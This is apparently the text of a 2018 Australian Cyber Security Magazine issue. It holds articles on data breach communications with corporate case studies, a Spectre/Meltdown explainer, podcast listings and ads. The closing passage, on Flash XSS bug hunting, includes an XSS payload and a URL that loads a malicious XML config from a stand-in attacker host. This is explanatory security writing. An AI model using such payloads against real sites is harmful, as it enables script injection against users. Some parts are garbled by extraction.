steps that have been taken and what you intend to do next. The most important aspect of a holding statement is to be honest. Aim to establish and maintain credibility by acknowledging the facts. Your credibility will depend on your audiences’ assessment and perception of your level of honesty and sincerity, so if credibility is lost, trust is lost also. Acknowledge that the information you have is incomplete and may change over time as your investigation continues. When drafting your holding statement consider the following: • Define and introduce your spokesperson – who are they exactly? • Keep the statement short and simple, for example, “We understand that there has been a data breach”. • Explain what your priorities are, “We are working to limit any damage or harm to our valued customers”. • Explain that the appropriate authorities have been contacted, for example law enforcement and specialist forensic investigators (if applicable). • Reassure the public of your priorities and assure the public and media that you will keep them updated as more information comes to light. Prior to an incident ensure that you have told your people how to respond to questions from the press and media, something along the lines of, “Thank you for your question. I am not a designated spokesperson for the company, please go to www.companywebsite.com.au” or contact our communications team. A statement must always express regret about the situation and be clear on what information you can provide

at this time and what cannot be provided. Ensure that you provide a consistent message across all channels, from the company website, your intranet (don’t forget about your employees) and social media. Prepare your call centre for an influx of calls and provide them with a script to ensure that everybody is sending a consistent message. The use of a call centre is important, as those affected must be able to speak to a live person, rather than a machine and try to keep wait times to a minimum. All technical incident response plans must be designed to answer 6 questions, the answers to these questions will allow you to craft your messages and identify who your audiences are. 1. What systems and data have been affected? 2. How did the attackers do it? 3. Who did it? 4. Is it over? 5. Can it happen again? If so, how? 6. How can we stop it from happening again? In order to communicate what has happened to your stakeholders, it is important to gather and understand all the facts of the breach inside and out. Understand and identify who is impacted and affected, because in turn you’ll use this information to develop your communication messages around those individuals and/or groups. Incidents can be very challenging and having a complete picture of what happened, who did it and why may take days or weeks and require specialist skills that your in-house team does not have. Consider using specialist incident response resources if your in-house team doesn’t have the rights skills and knowledge. Better still, have them on retainer. The time taken to ensure that the right contracts are in place before an incident will let you sleep better at night. You don’t want to be in a situation where you’ve just had a data breach and you’re negotiating contractual terms with the people that can help you the most. When a crisis or bad news strikes your organisation, the first place that the outside world will turn to for information is your company’s website. There won’t be time to construct a new site from scratch, so consider creating a “dark site’ ahead of time. A dark site is a prebuilt website that can be activated when needed. A dark site positions your organisation as the primary source of information about the crisis and it signals to the news and media that you intend to provide timely and accurate information and it demonstrates that you’re in control and taking your responsibilities seriously. In general, your dark site should list all available facts, any special instructions as to what those impacted should do, what steps your organisation is taking and any relevant contact information. On June 15, 2009, US Airways flight 1549 left New York airport and hit a flock of geese causing the loss of both engines. The plane made an emergency crash landing into the Hudson River, all 155 people survived the harrowing ordeal due to the skill and quick thinking of the pilot, Capt. Chesley “Sully” Sullenberger. This event helped Twitter become a social media powerhouse and it changed the way that the news is reported. The man who started it all is Janis Krums, he tweeted, “There’s a plane in the Hudson.

The plane made an emergency crash landing into the Hudson River, all 155 people survived the harrowing ordeal due to the skill and quick thinking of the pilot, Capt. Chesley “Sully” Sullenberger. This event helped Twitter become a social media powerhouse I’m on a ferry going to pick up the people. Crazy”. He tweeted that to his 170 followers. Exactly 32 minutes later he was being interviewed live on MSNBC and later his photo appeared on the front page of national newspapers. Twitter co-founder Jack Dorsey told CNBC in 2013, "Suddenly the world turned its attention, because we were the source of news—and it wasn't us, it was this person in the boat using the service, which is even more amazing!”. The news no longer breaks, it tweets. Social media is an umbrella term applied to web enabled applications that are built around user generated and manipulated content such as wikis, podcasts and social networking site such as Twitter, Facebook and YouTube. Social media has created citizen journalists and the age of instant news and direct reporting, from those that have been affected in some way. It has forever changed how the public gets their news. This in turn has changed the way that responses to a data breach must be handled such that a response must be immediate; it must include a commitment to two-way dialogue and to being open, honest and transparent about what has happened and what is being done to fix the problem. Social media adds a complexity to communicating in a crisis, the multiple user channels, user control over messages and the real-time delivery of these messages, makes social media far more complex to manage that the simple press releases of days gone by. The use of social media in your communications plan is no longer optional in the era of instant and always available news. When communicating post breach, your goal should be to satisfy your audience and provide sufficient information. Identify those that have been affected, ensure that your messages are correct and consistent, so that any corrections are limited. This will make it easier for you to maintain your credibility. The biggest mistakes are not being proactive and not having a full grasp of the facts of the breach before issuing communications. To develop and maintain credibility you must show that your organisation is on top of the situation and has implemented an action plan to control and mitigate against further harm. When structuring your communications, be sure to: • Admit your mistakes. • Communicate early and often. • Be sure to tell your side of the story before someone else does.

Australian Cyber Security Magazine | 19

Cyber Security

•

Explain what will be different in the future.

Communicating after a data breach is difficult as not all of the facts may be known, but it is always necessary to show concern for the safety of those that have been impacted. When choosing your communication channels, considering the following: • Written statement or press release; • Your website; • Email out to those affected; • Call centre scripts; • In store signage; • A written letter; • Social media posts; • Advertising on the radio, in TV or newspapers; and • A video message. In Australia, it is now mandatory for organisations that must comply with the Privacy Act to report breaches of personal information to both the Office of the Australian Information Commissioner (OAIC) and those affected. Notification is required were there is the real risk of serious harm. Once a decision has been made to notify those affected, consider when and how notification should occur and who will make it and who exactly will be notified. Notification may be made via phone, letter, email or in person. The notification should include: • A description of the incident. • The type of personal information that has been lost. • The organisation’s response. • What type of assistance is available. • Contact details. • How the individual may lodge a complaint to the OAIC. For a detailed discussion of Australia’s Mandatory Data Breach laws, refer to my article in the third edition of Australian Cyber Security Magazine, “Mandatory Data Breach Reporting: What You Need to Start Doing Right Now”. In other countries that do have mandatory data breach notification laws, the demand for identity monitoring and cyber insurance services grows once notification becomes mandatory creating new industries. Post breach notification requirements drive the implementation of incident response processes that may become a source of competitive advantage between organisations. Nothing beats real world examples, so let’s take a look at five breaches that have made the headlines, Uber, Equifax, Target, Anthem and Sony.

Uber Uber experienced a data breach in October 2016, but only revealed existence of the breach in November 2017. Hackers had accessed the personal information belonging to 57M Uber users and drivers. Uber had failed to notify its customers, drivers and regulators of the breach. The information accessed included name, email address, phone number and for some users, their driver’s license details. Following the announcement of the breach Uber provided that whose driver’s license information had been accessed

20 | Australian Cyber Security Magazine

free credit monitoring and identity theft protection. It was also revealed that Uber had paid $100K to the hackers responsible to delete the data and keep quiet regarding the breach. Ubers Chief Security Office and a deputy left in the wake of the scandal. At the time of the hack, Uber had just settled a lawsuit with the New York attorney general over data security disclosures and was in the process of negotiating with the Federal Trade Commission over the handling of consumer data. Uber is a company not short of controversy, at the time the breached was announced, U.S. officials are looking into possible bribes, illicit software, questionable pricing schemes and theft of a competitor’s intellectual property. Uber attempted to cover up the breach, this is never a good approach. They took over a year to disclose what had happened and when the details were disclosed it was found that they had paid the hackers $100K to keep quiet. Uber is now subject to numerous government backed law suits and investigations across many different jurisdictions, resulting from the failure to disclose the breach to regulators. Add to that the very likely class action law suits and Uber’s legal position becomes even more tenuous. When reached for comment, an Uber spokesperson said: "We take this matter very seriously and we are happy to answer any questions regulators may have. We are committed to changing the way we do business, putting integrity at the core of every decision we make, and working hard to re-gain the trust of consumers." In short, if you suffer a breach, disclose it in accordance with any applicable laws and within the required timeframe. Uber by all accounts failed generally at good corporate governance across many facets of its business operations. Incidentally, the hackers gained access to Uber’s AWS environment by using credentials they found in a private Git repository. Uber’s developers had published code that included their usernames and passwords.

Equifax In September 2017 the credit reporting agency said the information of more than 145 million Americans had been compromised. Whilst the data breach was not the largest, it could become the most economically damaging due to the sensitivity of the compromised information. The company’s handling of the breach is quite possibly the worst response to date of any organisation. The breach itself occurred sometime between mid-May and July. The hack was discovered on the 29th of July and the company waited 6 weeks to disclose the breach. If that was not bad enough: • In the wake of the breach Equifax offered free credit monitoring to customers – but the offer required anyone who enrolled to waive their right to sue the company. The company later backpedalled • CEO Richard Smith‘s apology is lack lustre at beat and does not highlight the gravity of the information that was lost and the implications for those impacted. Proper crisis management calls for a sincere apology that assumes responsibility, and promises to investigate the mishap and most importantly, make amends. Apologies written to reduce legal liability will not be taken well • The day after announcement of the breach, the Equifax

•

Twitter customer service account tweeted “Happy Friday! You’ve got Stevie ready and willing to help with your customer service needs today!” Twitter users did not appreciate the tweet’s tone. It was not a good way to show empathy to the many people worried they may become victims of identity theft. All social media channels should be aligned once an organisation is in crisis mode Those who called the number provided by Equifax and managed to reach someone or receive a return call were told that the call-centre had no information to share

Target A data breach is bad but letting someone else tell the world it has happened is even worse. Brian Krebs from www. krebsonsecurity.com leaked the story about the Target breach 6 days before Target acknowledged the situation. Over 40 million credit/debit card numbers were leaked as well as the personal details of over 70 million customers. The sooner the incident is acknowledged, the sooner you can start saving face. From the Target breach we learned that organisations must be prepared for the influx of customer complaints and enquiries. Targets Call Centre was over whelmed and its social media channels folded with complaints. Despite an initially shaky start, Target was able to pick up its responses by: • Daily news briefings. • The CEO issuing an apology via video. • Shoppers received a discount. • A web site was created for disseminating information related to the breach. • Providing free credit monitoring for a year to impacted customers.

Sony Sony’s response to the 2014 incident should stand as a lesson in what NOT to do. The Sony Picture CEO is on the record as stating that Sony had no playbook on how to respond. Sensitive document, embarrassing emails, unreleased movies and the personal information of over 40,000 people, both current and former employees, was leaked. Sony waited days to respond to the media and missed opportunities to update the public on what was happening. In short, be prepared, have a plan, test it and make sure that everyone on your team knows what to do when the inevitable data breach occurs. About the Author Wayne Tufek is currently the Director of CyberRisk (www. cyber-risk.com.au). For over 20 years he has formulated pragmatic, business driven strategies to establish, execute and improve cyber risk management in ASX listed companies and some of Australia's largest organisations across the public sector, Big 4, financial services, consumer products, education and retail sectors. Wayne is a member of Chartered Accountants Australia and New Zealand and holds the SABSA SCF, CISSP, CRISC and CISA qualifications. He frequently presents at security conferences and events in Australia and internationally.

INNO VATE

Anthem Anthem at the time of the data breach was the USA’s second largest health insurer. Over 80 million customer records were exposed containing personal information like name, address, date of birth, social security number, email address, phone number and salary. Upon discovering the breach Anthem, secured the vulnerability, contact the FBI and engaged an outside security consulting firm. Anthem’s initial efforts were praised by the FBI. Anthem’s response featured: • The launch of a dark site – www.anthemfacts.com • A statement by the CEO. • Release of frequently asked questions. (FAQ) • A phone hotline. • An open letter from the CEO. • Social media releases on Facebook and Twitter. • The provision of credit monitoring and identity protection services to impacted customers. Anthem was quick to respond to customer queries. Most news stories regarding the breach contained direct quotes from Anthem spokespeople, elements of their initials statements and links to the dark site.

Register now at cyberconference.com.au From only $275 Save up to $825 on conference fees by becoming an AISA member today and access the many benefits received by our membership network

OCT 9-11

2018

AUSTRALIAN CYBER CONFERENCE

AISA-2018-Forge-Press-Ad-V07.indd 1

BROUGHT TO YOU BY

aisa.org.au

9/02/2018 11:27 am

Cover Feature Cyber Security

n w o d t l e M fire n d o s ’ n r a he ca e t r e l t i h c Spe bout the tyres w

ng a Worryi

G By Elliot Dellys

rowing up, my father constantly gave me advice in the form of single-sentence philosophical soundbites. I couldn’t stand it at the time, but, over the course of my career I have parroted them far more often than I care to admit. The one I’ve found myself repeating more than any other is: “you’re worrying about the tyres while the car is on fire”. It is easy to get excited about new or dramatic information, especially when it potentially affects our business – yet too often organisations focus on the hot topics, while the broader enterprise is jeopardised by risks that remain overlooked or are simply put into the “too hard basket”. This article will provide a high-level technical breakdown of what has likely been the most widely-reported group of vulnerabilities to date, collectively referred to as Spectre and Meltdown. It will cover how speculative execution works, how it is vulnerable to attack, why the reach of Spectre and Meltdown is so broad and their impact potentially so catastrophic, and the current mitigations available. But I will also offer a case for why they are – at least for the time being – unlikely to be your business’ top cyber risk. For most readers Spectre and Meltdown are unlikely to even

22 | Australian Cyber Security Magazine

be your organisation’s most severe technical vulnerability – but they are almost certainly the most well-known. In closing, I will outline how a solid implementation of the security basics is typically the best protection against emerging threats. To understand the risk posed by Spectre and Meltdown, it is worth briefly outlining the principle of speculative execution. For decades CPUs have been designed to perform their number-crunching duties ‘out-of-order’ to attain processing speeds beyond what is achievable from a simple sequential instruction cycle. Modern processors typically achieve this via speculative execution, in which multiple execution branches are prepared simultaneously and the hardware assumes – or ‘speculates’ – about which branch is likely to be taken. When this speculation is accurate, the processing time is decreased as the instructions have already been calculated; when it is not, the unnecessary calculations are simply discarded. The fundamental flaw in this process is that speculative execution allows for privileged information to be observed by a process of lower privilege. The three Common Vulnerabilities and Exposures

Cyber Security

Exploiting each requires a slightly different attack methodology: whereas Meltdown disregards privilege boundaries to allow an unprivileged process to access the kernel address space, Spectre leverages branch prediction to execute erroneous instructions and leak information from the victimâ&#x20AC;&#x2122;s memory address space.

(CVEs) disclosed to date include: CVE-2017-5753 (Bounds Check Bypass) and CVE-2017-5715 (Branch Target Injection), collectively known as Spectre; and CVE-20175754 (Rogue Data Cache Load), which has been dubbed Meltdown. Exploiting each requires a slightly different attack methodology: whereas Meltdown disregards privilege boundaries to allow an unprivileged process to access the kernel address space, Spectre leverages branch prediction to execute erroneous instructions and leak information from the victimâ&#x20AC;&#x2122;s memory address space. The breadth of these vulnerabilities is exceptionally broad: Meltdown affects almost all of Intel's x86 processors (and some ARM designs) and Spectre, which exploits a wider range of speculative execution features, potentially affects all Intel, AMD, and ARM microprocessors. This means almost every processor produced in the last twenty years is vulnerable, regardless of operating system or device type (including network equipment, end-user systems, as well as mobile and IoT devices). In fact, the Spectre attacks are so adaptable that by leaking information from the browser address space to JavaScript, sensitive information such as credentials or credit card details from any capable

device can potentially be exposed. One of the saving graces of the Spectre and Meltdown threat is that, as of the time of writing, no publicly known malware exploits these vulnerabilities. With so many potential targets and such valuable data ripe for the taking, it is natural to wonder why. Luckily, these attacks are very difficult to execute in the wild for several reasons. Firstly, vendors were notified under non-disclosure agreement several months before the public announcement to allow ample time for mitigations to be developed and infrastructure to be updated. This has made opportunistic malware development significantly less fruitful. Secondly, for these attacks to be viable, the attacker must already be able to run code on the target machine; in the case of Spectre, this can include malicious JavaScript executed by the user's browser. This poses an additional and non-trivial hurdle for any attacker hoping to mount a Meltdown or Spectre attack. Thirdly, the applicability of the vulnerabilities is relatively limited. Exploiting Spectre or Meltdown does not inherently enable code execution, network lateral movement, spoofing, repudiation, etc. Finally, developing software capable of exploiting these vulnerabilities requires an exceptional level of skill and a deep knowledge of the target environment. The reconnaissance necessary to execute a Spectre or Meltdown attack is orders of magnitude greater than the SMB handshake required to detect vulnerability to Wannacry, for example. Nonetheless, there is inevitably a delay between vulnerability disclosure and industry remediation that provides attackers a window of opportunity. So, what can be done right now to prevent future attacks? Operating system patches are either already available or under development to address the two vulnerabilities. For Meltdown, this entails isolating the kernel and user mode page tables to prevent leakage of sensitive data. For Spectre, the solution is not so straightforward: as there are two variants of attack that each affect a far broader range of hardware, modification of the compiler

Australian Cyber Security Magazine | 23

Cyber Security

or elimination of branch speculation for processes pertaining to sensitive data is required. To minimise the risk of attacks using JavaScript, WebKit have begun implementing branchless security checking as well as reducing timer precision, and Intel has announced it will begin implementing capabilities to alter the behaviour of branch prediction for its processors as well as releasing microcode updates where possible. AMD have responded by advocating for a collaborative effort amongst industry and safe computing practices (including patching) for customers to minimise the threat. Unfortunately, but predictably considering speculative execution exists to optimise processor performance, the current solutions come at a performance cost. By isolating the kernel and user mode page table, the translation lookaside buffer (which is responsible for mapping virtual addresses to physical memory addresses) needs to be constantly flushed. This has been widely reported to cause up to a 30% loss of performance, however, early benchmarking results indicate this figure is the exception, not the rule, and only representative of workloads that demand constant context switching (i.e. frequent access to both the user and kernel memory space). Obviously, there are industries and networks with a very low tolerance for performance loss, for whom careful prioritisation of patch deployment and a strong asset management strategy are essential. For most organisations – and individuals – the performance drop is likely to be negligible. The authors of the Spectre and Meltdown whitepaper acknowledged the inevitable performance impacts from the outset, attributing the emergence of these vulnerabilities to a “longstanding focus in the technology industry on maximizing performance”. Mitigations that better preserve the efficacy of speculative execution and data caching are also likely to emerge in the coming months, so concerns about performance loss from patching is, for most industries, likely to diminish correspondingly. Of course, this timeless balancing act between performance or user experience and security is nothing new. I have explained to numerous clients why having a “zero risk tolerance” functionally entails shutting an entire system down. The goal is therefore to ensure the allocation of effort is proportionate to risk, in both identifying exposure to emerging vulnerabilities in general and in ensuring security requirements are considered alongside performance expectations. To achieve this, a clear security strategy is invaluable: getting the basics right always provides a strong starting position to counter any emerging threat. In the case of Spectre and Meltdown, an unpatched browser or existing access to the target device is a prerequisite for exploitation and therefore the standard suite of security controls (such as ASD’s Essential Eight) provides a solid baseline of protection against an attacker, gaining the necessary initial foothold. Maintaining an accurate asset register and understanding the value of those assets is also imperative. For some devices, performance may be critical, and the information handled is without sensitivity; for others, performance will be less important, but the information processed requires the utmost protection. This insight is essential when making

24 | Australian Cyber Security Magazine

informed decisions about what devices require immediate attention and which can be afforded a lower priority for remediation. Understanding what other vulnerabilities those assets may be exposed to, also provides a more complete picture of the threat environment and can inform risk tolerance and management strategies. It is also crucial to avoid underestimating the human element. A well-trained and informed workforce is one of the best measures to ensure vulnerable assets are not discovered by a threat actor in the first place. The same holds true for key decision-makers. Test your key assumptions and ask: “how would I gain unauthorised access to my organisation’s sensitive data?” For most readers, this exercise will almost certainly produce a long list of vectors that pose a greater threat than Spectre and Meltdown. This perspective goes a long way towards ensuring your attention is focussed on the flaming engine, and not the shiny new Bridgestones. As a final note, it is my belief that the media and industry reaction to the disclosure of Spectre and Meltdown has exposed a fascinating selection bias in the way we contextualise risk – but that will be the subject of another article. About the Author Elliot Dellys is a Senior Security Advisor for Hivint, with extensive experience delivering complex technical projects, teaching international audiences, and providing risk management and compliance advice across Government and Industry. Elliot is a firm believer that strong relationships and a collaborative culture are the keys to achieving meaningful security maturity, and enjoys writing on the more abstract applications of cyber security in the fields of politics and ethics.

Weâ&#x20AC;&#x2122;re TRANSFORMING Join us as we embark on the next phase of our journey

- visit our new online store at hills.com.au -

HCORP0011-Jan18-v1

For more information on these and other best-in-class solutions from Hills call us on 1300 HILLS1 (445 571) or visit hills.com.au

facebook.com/HillsLtd/ CONNECT

E N T E RTA I N

SECURE

Australian Cyber Security Magazine | 25

E TUN IN ! NOW

www.australiancybersecuritymagazine.com.au

PODCAST HIGHLIGHT EPISODES

Episode 28 – Australia’s eSafety Commissioner, Julie Inman-Grant discussing online safety, cyber bullying and child exploitation

Episode 15 – Protecting media & journalists in hostile environments – Shannon Sedgwick, CEO of GM Risk Group

Julie Inman-Grant, the Australian eSafety Commissioner at the Office of the eSafety Commissioner, speaks with Chris Cubbage at the Women in Cyber Mentoring Event in Sydney. Julie discusses her role and her focus on online safety, preventing cyber bullying, and child exploitation, and how her 17 years formerly at Microsoft, as well as Adobe, and Twitter, assist her in her role as the Commissioner of eSafety.

In this interview, Chris Cubbage interviews Shannon Sedgwick, CEO of GM Risk Group, a consulting firm specialising in protecting media staff, both in terms of physical and cyber security, as they travel in hostile environments.

Chris and Julie also discuss the three pillars within eSafety of safety, security, and privacy and their inter-connectedness and priorities, and how parenting and education are still the two major lines of cyber-defence.

Shannon has personally provided protective services to media companies and has travelled to over 30 countries this year, including the Congo, Afghanistan, and Iraq. Shannon discusses the services that GM Risk Group provide, how to mitigate risk, and the increased focus of media companies on duty of care and overall safety for journalists. If you, or members of your team work in regions of the world, where data or physical safety are at risk, then you’ll enjoy this interview with Chris Cubbage and Shannon Sedgwick.

Episode 25 – ECU Cooperative Research Centre & Dr Peter Hannay’s research into historical location data within digital devices In this interview, Dr Peter Hannay of Edith Cowan University (ECU) provides insight into the recent completion of his doctoral research which focused on historical location data that can be gathered from small and embedded devices. This research was used by WA Police to assist in homicide cases, for tracking a suspect’s movements, as well as providing a credible alibi. Peter also talks about ECU’s Cooperative Research Centre, a $130 million-dollar project, as well as leading research in cyber security, particularly IoT. If you’re interested in cyber security research, and true crime, then you’ll enjoy this interview with Chris Cubbage and Dr Peter Hannay.

Episode 8 – Meet Renowned Autonomous Vehicle Security Architects & “White Hat” Hackers, Dr. Charlie Miller and Chris Valasek, GM’s Cruise Automation You’ll love this interview with Charlie Miller and Chris Valasek. As the sixth interview at #AISACON17 in Sydney, we met these celebrity ‘security architects’, who first hacked two non-connected, commercially available cars using a diagnostic port. While some consideration was made to security in the original software, Chris and Charlie highlighted that with a little problem solving, and a lot of patience, control systems, effecting steering, brakes and lights could be manipulated. Later, the dynamic duo set their sights on ‘remotely’ hacking a Jeep SUV. In this interview, we’ll learn how they were able to bridge the gap between the ‘head unit’ or radio, and the control systems, and take control. All while the driver was travelling at over 100 km per hour. Enjoy the discussion!and privacy and their inter-connectedness and priorities, and how parenting and education are still the two major lines of cyber-defence.

Episode 17 – Tackling online extremism through inclusion and tolerance: The Raqib Taskforce In this interview, Chris Cubbage interviews Anooshe Mushtaq, Chair and Founder of The Raqīb Taskforce, an organisation that promotes social inclusion and cohesiveness for Australia’s Muslim community, particularly the youth. Anooshe shares how her grassroots organisation is helping to debunk hate speech, remove division, and promote the voice of young Muslims, to counter extremism both within and outside the Muslim community. This involves a host of online and social media strategies. Ultimately, the Raqib Taskforce aims to build a tolerant and cohesive society, through better understanding of all sides. Please Note: This interview was arranged and conducted by MySecurity Media independently of the Risk Management Institute’s National Conference. Recorded November 16, 2017, Canberra.

Episode 9 – Cyber Threat Alliance (CTA) President Michael Daniel in Sydney #AISACON17 Our seventh interview at #AISACON17 in Sydney in October, is with the President of the Cyber Threat Alliance, Mr Michael Daniel. In this interview, Michael Daniel talks about his new role at the Cyber Threat Alliance, or CTA, and how his organisation and the 12 member companies are sharing threat intelligence at speed and scale. In particular, you’ll hear about the CTA’s ‘sharing rule’, that ensures collaboration, and improves all members’ products and services. And this sharing is quick. Michael highlights that the time from detection by one member company to deployment by another member company can be as short as only 54 minutes. In this interview you’ll hear cyber security vendors working together to collectively, systemically disrupting the ‘bad guys’.

www.australiancybersecuritymagazine.com.au

PODCAST HIGHLIGHT EPISODES

Episode 49 ASEAN-Australia AUSTRAC Codeathon 2018 – Interview with AUSTRAC’s Chief Innovation Officer & Director for Innovation, Information & Transformation Chris Cubbage talks to Leanne Fry, Chief Innovation Officer, and Rajesh Walton, Director for Innovation, Information & Transformation, both of AUSTRAC, at the ASEAN-Australia Codeathon held in Sydney.

Episode 37 Red Hat, the world’s largest open source software company in APAC & video surveillance You’ll hear about the role of Red Hat as a technology steward, bridging open source software with enterprises, while maintaining piece-of-mind, the Red Hat product suite, and their role in reducing the costs within the surveillance market through more efficient data compression algorithms and storage.

Episode 47 The entertaining Adam Spencer, MC of the ASEAN-Australia Codeathon, hosted by AUSTRAC

Episode 36 Artificial Intelligence, Deep Learning & Neural Networks

The always entertaining and intelligent Adam Spencer, MC at the ASEANAustralia Codeathon in Sydney, hosted by AUSTRAC. Adam discusses the importance of regional collaboration, with respect to cyber security, and also how blockchain technologies could help to increase integrity in our daily lives.

Hans Skovgaard, the Vice President of Research & Development with Milestone Systems discusses Artificial Intelligence, it’s changing popularity over the past 30 years, and its resurgence in relation to deep learning, due to the power of today’s computational neural networks

Episode 48 Implications & Opportunities of the European Union’s GDPR and Australia’s NDB scheme

Episode 31 Women in Cyber – Sandra Ragg, Deputy National Cyber Security Adviser within the Department of Home Affairs and Cabinet & Heide Young, National Events Manager, Australian Women in Security Network

David Kemp, Specialist Business Consultant, and Matthew Hanmer, Regional Director Security Software, both from Micro Focus, the 7th largest pure software company in the world, discuss the implications of the European Union’s GDPR, or General Data Protection Regulation, and Australia’s Mandatory Notifiable Data Breach (NDB) scheme.

Episode 45 Insight into MarkLogic’s Secure NoSQL Database Tim Macdermid, VP of Sales for APJ, and Jason Hunter, the CTO of Asia-Pacific, both of MarkLogic talk about the company’s growth, and expansion starting from servicing publishing, public sector, intelligence agencies, and financial services, big and small, as well as its application within cyber security.

Sandra Ragg, Deputy National Cyber Security Adviser within the newly formed Department of Home Affairs and Heide Young, the National Events Manager for the Australian Women in Security Network, or AWSN discuss the role of the AWSN, its rapid growth in membership, future plans of cooperation and initiatives, its role in mentoring women in cyber security, as well as the cultural change required to increase the percentage of women in cyber security, but also the importance of inclusion of women, not just diversity for diversity’s sake.

Episode 30 CISO Insights – Narelle Devine, Chief Information Security Officer – Australian Department of Human Services

Episode 22 Analyst Insights – Enterprise cyber security market & China’s citizen score card with cyber regulations

Narelle Devine, Chief Information Security Officer for the Department of Human Services discusses the difficulty in going out to market to find talent in cyber security, and how it takes ‘all sorts’ with a broad experience to build a strong cyber security team. The interview also discuss her role as a CISO and the importance of developing a peer-to-peer network to generate solutions and collaborate on ideas.or General Data Protection Regulation, and Australia’s Mandatory Notifiable Data Breach (NDB) scheme.

Claudio Stahnke, Research Analyst focused on IT security with Canalys, recorded at the Canalys Channels Forum, 5-7 December, 2017 in Perth discusses the enterprise cyber security market in general, the EU’s General Data Protection Regulation, or GDPR, as well as mandatory reporting on security breaches, cyber insurance, vendor mergers, IoT predictions, and China’s citizen score card (Social Credit System) and their cyber regulations.

www.australiancybersecuritymagazine.com.au 28 | Australian Cyber Security Magazine

W O N

S G A E E-M

T U O

N I L N O

THE

MEN

VERN

G GO

EADIN

Y’S L UNTR

ECU

ATE S

RPOR

CO AND

.austr www E |

GAZIN

MA RITY

ecu lians

ritym

agaz

2018 March

g the Closin gap ls il sk curity

g an Creatin rld – EAD wo s ence ING sGtOeVm intellig e Sy ERNME Cybe Mileston IPS 2018 NT AND COR POR ATE of 20 rsecurity M SEC URIT 18 Trend YM AGA s ZINE y it | w r u c ww.a e S siap in l n a e acif n The s o m s o icse r e W P curit t l: yma cryp ate of m Specia o deliver gaz ine.c tomi t n om y it ning inaslipcirioautio s secur Sma rt Ph o Alter Cont nes as Ac n rol C powe ative pa rede cess ymen ntial red b s ts y Blo Trend ckch s in t ain h indu Dark stry e techno – op logy Anon Web, Tor p ymit & scale ortunity, y & Ch ina THE

mous

no f auto Rise o s vehicle

sics

l foren

REG

ION

’S L

March

READ NOW

$8.95

om.a

sa nge a te cha y issue a m li C curit al Sse nation

Cyber

fine are de Softw ing th every

Digita

ine.c

Feb /

e s in th try Trend logy indus o n tech

227

100003

ved PP

t Appro

Print Pos

urity

Sec men in

/ April

2018

Intel Creating ligen a t Wo n rld

tim | Tech

Auto

nom The Rise ous V ehicl of es

INC. GS

$8.95

INC.

GST

CYBERS ECURITY TRENDS of

READ NOW

201

PLUS

Wom en

in Se

curit

y | T echt

ime

www.australiancybersecuritymagazine.com.au

Australian Cyber Security Magazine | 29

Cyber Security

XSSposing bugs via Shockwave Flash analysis

F By Jason Magic

lash player related vulnerabilities have been notorious in their susceptibility to a vast range of attacks over time. When performing an offensive engagement, whether it’s through consultancy, or through external responsible disclosure programs, it is highly recommended that analysis of any Shockwave Flash (SWF) file be performed. While many haven’t explored such an attack path, this is a widely known issue. During my brief period as a bounty hunter, I had identified SWF related vulnerabilities, within a multiplex of

associated with the insecure variations being hosted and exposed to the public domain. SWF files are created through ActionScript syntax, which, is very similar to JavaScript, as both conform to the ECMA-based syntax. Like any other language, failure to properly validate and sanitize user inputs, can leave the segment vulnerable to various attacks. Furthermore, ActionScript itself contains vulnerabilities associated with it, this includes methods rendered ‘unsafe’, such as, but not limited to:

organizations, as well as high profile government entities, including that of; Police agencies, NASA, NATO, Australian Signals Directorate, US Army, US Airforce, US Navy and more. As opposed to deep diving into flash exploitation and the various attack vectors. This article will be focusing on a more generic overview, prior to presenting my own findings, as a reminder as to how Shockwave Flash (SWF) files can pose a threat, their capabilities and the potential attack path

externalInterface.call(); getURL(), loadVariables(), navigateToURL(), loadMovieVar(), loadMovieNum(),LoadVars.load, LoadVars.send, XML.load ( 'url' ), XML.sendAndLoad ( 'url' ), LoadVars.load ( 'url' ), LoadVars.send ( 'url' ), flash. external.ExternalInterface.call(_root.callback), externalInterface.addCallback, AddDLL, etc..

Cyber Security

Insecure global variables:

_root, _global, _level0

In terms of performing the analysis, SWF files can be decompiled through various tools, a common one being flare. Therefore, exploitation is handled in a white-box mannered approach. Once decompiled a source code analysis can be initiated. There are tools out there that can perform a static-code analysis in an automated manner, however, they often miss many insecurities. Therefore, it is recommended that a more manual approach be taken. Since ActionScript is a straight forward language, only basic knowledge of its structure, methods and syntax is required. The main objective with the code analysis is to get an overview of the code flow, how variables are handled and, if possible, how to manipulate such variables. For example, look for lack of input sanitization, undefined flashvars, use of the insecure global variables and method calls. If any of the above global variables are declared, but remain undefined, then it is likely that the SWF will be vulnerable. For example, see a vulnerable decompiled source below: button 48 { on (release) { var str = (_level0.clickTag != undefined) ? _level0. clickTag getURL(str, ''); } } The above illustrates a vulnerability pertinent to the clickTag flashvar. During an analysis, it was discovered that this ‘clickTag’ variable is associated with the release of button 48, note the use of the global var, _level0. This button was mapped to the entire flash movie. This means that the value stored within this flashvar is called strictly upon the condition of the victim clicking anywhere on the movie itself. Therefore, in this case, the vulnerability does require a form of social interaction for its successful exploitation, as the user is required to click on the flash movie to trigger the exploit. In the case of the above scenario, the clickTag flashvar was initially declared to serve a purpose of re-directing a user to an informative page segment within the HTTP content. However, due to the lack of variable definition, as well as, lack of input sanitization, use of the unsafe GetURL() method, and incorporation of the insecure _level0 global variable; an attacker is able to control the behaviour of the vulnerable variable in question. This is achieved by assigning malicious values to that var and have it called via GET. Such vulnerabilities could exist within Shockwave Flash files includes; SOME attacks, content forgery, unvalidated redirects, as well as XSS, thus allowing an attacker to execute malicious client-side scripts.

'As opposed to deep diving into flash exploitation and the various attack vectors. This article will be focusing on a more generic overview, prior to presenting my own findings, as a reminder as to how Shockwave Flash (SWF) files can pose a threat ' In terms of exploiting such vulnerabilities through a cross-domain approach, some vendors incorporate an XML config file, to control the behaviour of the SWF. Therefore, these SWF files may have a dynamic flashvar pointing to a config file on the same server the SWF is hosted on. However, if this flashvar can be controlled by the attacker externally, with a correct cross-domain policy configured on the attacking server, all that is required is to remotely call a malicious XML variation (hosted on an attacker’s server), which in turn will include the instructions to control the SWF, thus determining its behaviour. The attack vectors associated with this method of exploitation remains similar as to that of the above, however, the methods slightly vary. For example, an XSS payload is incorporated within an XML entity, either as a variable’s value, or included in an arbitrary sense, through the malicious XML via the use of CDATA: [CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/ script<![CDATA[>]]> This would then be called in the manner of: http://example.com/swf/example.swf?xml_path=//attacker. com/poc.xml I identified this issue within many SWF generators and slideshow makers, including that of a Windows application titled Flash Slideshow Maker Professional, with version 5.20 and below being vulnerable in the way they handle ‘advanced’ file behaviour. See 